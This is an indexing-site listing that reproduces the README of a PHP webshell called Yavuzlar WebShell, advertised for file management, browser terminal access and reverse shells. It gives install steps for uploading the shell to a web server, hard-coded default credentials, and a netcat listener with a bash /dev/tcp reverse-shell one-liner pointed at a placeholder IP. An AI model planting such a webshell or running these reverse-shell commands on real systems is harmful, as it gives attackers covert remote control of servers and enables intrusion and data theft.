An open API service indexing awesome lists of open source software.

https://github.com/rootshelll/yavuzlar-webshell

Discover Yavuzlar WebShell, a powerful web-based shell tool for file management, terminal access, and reverse shell operations. Learn how it enhances remote administration and cybersecurity simulations.
https://github.com/rootshelll/yavuzlar-webshell

cybersecurity file-manager php-shell remote-administration reverse-shell terminal web-based-shell yavuzlar-webshell

Last synced: 3 months ago
JSON representation

Discover Yavuzlar WebShell, a powerful web-based shell tool for file management, terminal access, and reverse shell operations. Learn how it enhances remote administration and cybersecurity simulations.

Awesome Lists containing this project

README

          

# Yavuzlar WebShell - Web-based Shell for Cybersecurity

![Yavuzlar WebShell](https://r00t-shell.com/wp-content/uploads/2025/03/yavuzshell.gif)

## πŸš€ What is Yavuzlar WebShell? πŸ€”

Yavuzlar WebShell is a web-based shell application that allows you to manage server files, execute terminal commands, and use reverse shellsβ€”all from the comfort of your browser. It was built using **PHP** and **CSS** with a minimalist interface designed for remote administration and cybersecurity simulations.

---

## πŸ”‘ Key Features

- **File Manager πŸ“**: Easily upload, edit, delete, and download files securely over the web.
- **Terminal πŸ–₯️**: Execute system commands through a browser-based terminal.
- **Reverse Shell πŸ”„**: Use reverse shell techniques for remote system control.
- **Directory Navigation πŸ“‚**: Navigate directories and manage file permissions effortlessly.
- **Security πŸ”’**: Requires user login for all operations, ensuring secure access.

---

## πŸš€ Getting Started

### πŸ“₯ Installation

1. Clone the repository:
```sh
git clone https://github.com/RootShelll/Yavuzlar-WebShell.git
```
2. Upload the files to your web server.
3. Ensure PHP is installed and configured properly on your server.
4. Open the WebShell in your browser.

### πŸ”‘ Default Login Credentials

```plaintext
Username: admin
Password: R00t
```

> ⚠️ **Important Note:**
> Make sure your server is properly secured, and only authorized users have access to the WebShell.

---

## πŸ”§ Advanced Usage

If you're familiar with command-line tools, you can enhance your experience by using the terminal feature to run various system commands. For example:

```sh
ls -la # List all files in the current directory
```

```sh
cat filename.txt # Display the content of a text file
```

### πŸ”„ Reverse Shell Operations

Use the following commands to establish a reverse shell connection:

```sh
nc -lvp 4444 # Listen on port 4444 for incoming connections
```

```sh
bash -i >& /dev/tcp/your_ip/4444 0>&1 # Reverse shell with bash
```

---

## πŸ“œ License

This project is licensed under the **MIT License** - see the [LICENSE](LICENSE) file for details.

## πŸ“¬ Contact

For support, open an issue or reach out via email: **help@r00t-shell.com**